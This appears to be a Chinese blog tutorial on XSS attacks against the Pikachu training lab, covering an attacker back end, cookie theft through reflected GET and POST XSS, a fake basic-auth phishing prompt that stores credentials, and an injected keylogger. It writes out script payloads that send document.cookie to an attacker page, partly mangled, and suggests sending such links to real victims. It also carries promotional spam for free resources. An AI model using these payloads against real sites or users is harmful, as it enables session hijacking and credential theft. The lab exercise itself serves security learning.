龙空技术网

黑客是怎么cookie获取的?钓鱼?键盘记录?

网络安全小白入门 420

前言:

此时看官们对“js调起键盘”大体比较讲究,咱们都想要学习一些“js调起键盘”的相关资讯。那么小编在网络上网罗了一些对于“js调起键盘””的相关文章,希望小伙伴们能喜欢,同学们快快来了解一下吧!

xss后台的搭建 1 打开pikachu找到管理工具xss后台

2 点击xss后台看到下面的界面就是成功了

3 进行登录页面,登录进去即可。

XSS案例:盗取Cookie 实验机器 攻击者127.0.0.1:88 受害者127.0.0.1:88 漏洞服务器127.0.0.1:88 攻击流程

修改C:\xampp\htdocs\pkxss\xcookie下的cookie.php,将IP地址改为漏洞服务器的地址(这里注意一下因为xss后台是可以单独拿出来运行的后台,所以我将pkxss后台文件从pikachu文件拿出来放在pikachu同一目录下)

① 200多本网络安全系列电子书 ② 网络安全标准题库资料 ③ 项目源码 ④ 网络安全基础入门、Linux、web安全、攻防视频 ⑤ 网络安全学习路线 免费领取私信”安全“

**注意:**由于我把pkxss文件从pikachu拿出来,如果我们从pikachu平台进入xss平台不会成功,这个时候我们想进入xss后台只需要在游览器输入

xss(get)的窃取和利用 在这里我准备了一段js的代码,它会通过document里面的这个location这么一个实例,来做一个重定向,他会访问我们这个的后台页面,访问的时候通过document中的cookie把本地cookie的值带过去。 1 打开pikachu平台的反射型xss(get)输入<script>document.location=';+document.cookie;</script>(输入之前要修改长度限制之前文章讲过)

当用户提交的时候,我们就能取得用户的Cookie, 提交过后页面刷新到pikachu的页面这样达到我们想要要求。 2 打开xss后台,可以看见刚刚我们获取的cookie

在实际的场景中我们可以把发送给用户,一旦他访问啦这个链接,我们便会获得他的cookie值,

图中第二个就是别人访问时我们获取的cookie。

xss(post) 基本原理

实验之前需要将C:\xampp\htdocs\pkxss\xcookie的post-html数据进行相应的id更改这两个地址分别是漏洞服务器 和 攻击者 的服务器地址

1 我们首先是登录一下

2 这里是以POST的方式提交的,参数内容不会出现在URL中,可以抓包看一下

这时候我们不能直接把我们的恶意代码嵌入到URL中 3 我们只需要诱导受害者点击链接就能窃取用户的Cookie

xss漏洞钓鱼 思路:构造一个payload嵌入到网页中,让用户每次访问这个页面时都会执行我们的payload,我的payload:<script src=";></script> 意思是访问fish.php文件。 fish.php文件内容如下:

fish文件做的事情是:判断用户是否输入了账号和密码,缺一不可,如果没有则弹出一个basic验证,如图

当输入账号和密码的时候他就会带着账号和密码访问另一个文件(网页),这个文件就是xfish.php xfish文件如下:

作用是把传来的账号和密码上传到我们(攻击者)的数据库中。 如果你在basic验证框中输入了账号和密码,如图:

则攻击者的数据库中会存有你输入的账号和密码,如图:

xss键盘信息获取 在实验前,我们先了解下什么是跨越

为什么要有同源策略: 设置同源策略的主要目的是为了安全,如果没有同源限制,在浏览器中的cookie等其他数据可以任意读取,不同域下的DOM任意操作,ajax任意请求其他网站的数据,包括隐私数据 开始操作 1 修改ip,ip修改为自己pkxss后台的ip地址

2 在对话框输入<script src=" ;> </script>(这个违反了同源策略,但是由于127.0.0.1:88/pkxss/rkeypress/rkserver.php是攻击者自己搭建的,攻击者可以允许所有的人跨域请求他)

3 我们随便输入几个数字或者字母,会发现我们的js能把我们的输入全都抓下来。

标签: #js调起键盘